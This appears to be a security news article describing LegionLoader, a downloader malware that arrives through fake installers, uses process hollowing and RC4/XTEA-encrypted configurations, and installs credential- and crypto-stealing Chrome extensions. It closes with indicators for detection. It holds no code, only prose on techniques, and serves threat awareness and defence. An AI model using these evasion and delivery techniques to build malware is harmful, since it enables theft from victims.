LegionLoader, a C/C++ downloader malware, first emerged in 2019 and has been actively evolving by employing various tactics, including delivering malicious Chrome extensions that manipulate emails, monitor browsing, and even transform compromised browsers into HTTP proxies.Â
These extensions can also capture screenshots and interact with financial accounts on platforms like Facebook, Coinbase, and Google Pay. Recently, it has expanded its arsenal by delivering stealers alongside extensions like LummaC2, Rhadamanthys, and StealC.
It spreads primarily through drive-by downloads, luring victims to websites hosting fake installers, ultimately leading to payload delivery via RapidShare, which redirects to MEGA.
The MSI file sends the date, time, and language information to a server to retrieve a password, which is used to decrypt a ZIP archive containing a malicious DLL file.Â
The DLL file is side-loaded into a legitimate process (explorer.exe) using the process hollowing injection technique, while the RC4 key for decryption is calculated using a combination of constants, registry key value, and CRC32 hash.
LegionLoader is a malicious program that connects to a command-and-control server (C2) to download configuration, which is Base64-encoded and RC4-encrypted with a known key.
It uses a Mersenne Twister random number generator to generate a random string to be appended to the GET request sent to the C2 server.
The decoded PowerShell command downloads a malicious Chrome extension from a specific URL, which can alter email content, steal cryptocurrency funds, capture screenshots of Chrome tabs, and collect system information.Â
Obfuscated PowerShell scripts are utilized by attackers in order to circumvent detection and establish a persistent presence on the system.
The loader first retrieves an encrypted file from the C2 server, where the filename of the downloaded file is generated using the Mersenne Twister algorithm and has a .dat extension.
Then, the loader decrypts the file, and if the decrypted file is an executable, it is renamed to svchost.exe and placed in a subfolder under %TEMP%. If it is a DLL, rundll32.exe is used to execute the file, while if it is a batch file, the ShellExecuteA function is used to launch the file.
According to Trac-Labs, LegionLoader is a malware loader that fetches configuration files from hardcoded C2 servers and uses them to download next-stage payloads. It can also send data to secondary C2 servers to report on task execution results.Â
The configuration files contain shellcode encrypted with XTEA, which decrypts the next-stage payloads. In some cases, the next-stage payloads are PowerShell commands.
To mitigate potential threats, users should monitor for several key indicators, which include suspicious HTTP GET requests to specific URLs, the presence of unexpected svchost.exe files in the TEMP folder, and the dropping of ZIP and MSI files with specific naming conventions in the Downloads folder.
They should scrutinize outbound network connections from the explorer.exe and Chrome processes, paying close attention to suspicious IPs and connections to crypto domains.
By analyzing PowerShell activity for base64-encoded commands and investigating the presence of a malicious Chrome extension named “Save to Google Drive” in specific AppData locations.
.webp?w=1200&resize=1200,0&ssl=1&description=LegionLoader, a C/C++ downloader malware, first emerged in 2019 and has been actively evolving by employing various tactics.){kind=link}